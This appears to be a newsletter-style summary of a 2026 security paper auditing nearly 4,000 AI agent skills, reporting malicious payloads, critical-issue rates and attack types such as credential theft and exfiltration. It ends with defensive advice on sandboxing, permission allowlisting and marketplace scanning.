Paper of the Week — Exploring the Emerging Threats of the Agent Skill Ecosystem

Exploring the Emerging Threats of the Agent Skill Ecosystem

Beurer-Kellner et al. Published 2026-05-27. arXiv:2605.28588

One sentence summary

A security audit of nearly 4,000 AI agent skills from major marketplaces found 76 confirmed malicious payloads and that 13.4% of all skills contain at least one critical-severity issue.

Why this paper

Agent skill/plugin ecosystems are expanding fast — every major agentic framework now has a marketplace. Yet security vetting remains almost entirely absent, and this is the first systematic audit to quantify how bad the problem actually is.

What they did

The authors scraped and analyzed 3,984 AI agent skills from major skill marketplaces, manually reviewing flagged candidates and running automated scanning for malicious patterns. They categorized threats by severity and attack type, tracing how malicious skills survive publication and remain discoverable.

Key findings

76 confirmed malicious payloads found across the corpus — not theoretical, manually verified
13.4% of all skills contain at least one critical-severity security issue
At least 8 malicious skills were confirmed still active and available at time of publication
Attack types include credential theft, backdoor installation, and data exfiltration — not just prompt injection
Skills exploiting MCP (Model Context Protocol) context were among the vectors identified

Why it matters for practitioners

If you’re building agents that load skills from external registries — or building a product that lets users install third-party skills — this paper is a direct threat model for your system. The 13.4% critical-issue rate means a randomly sampled skill has roughly a 1-in-7 chance of containing something dangerous, which is a baseline you can’t ignore when designing permission models or sandboxing.

The data exfiltration and backdoor findings are particularly sharp: these aren’t crashes or misbehavior, they’re silent. An agent that silently exfiltrates API keys or installs persistence mechanisms will pass most functional tests cleanly.

What you can use today

Before ingesting any third-party skill into your agent, treat it like an untrusted binary: sandbox execution, restrict filesystem and network access, and audit what environment variables and credentials are in scope
Apply allowlisting over blocklisting for tool permissions — skills should declare required capabilities upfront and be denied anything undeclared, similar to mobile app permission models
If you maintain a skill marketplace or registry, the paper’s threat taxonomy (credential access, backdoor, exfiltration) gives you concrete categories to build automated scanning rules around — static analysis of skill metadata and code before publication is the minimum bar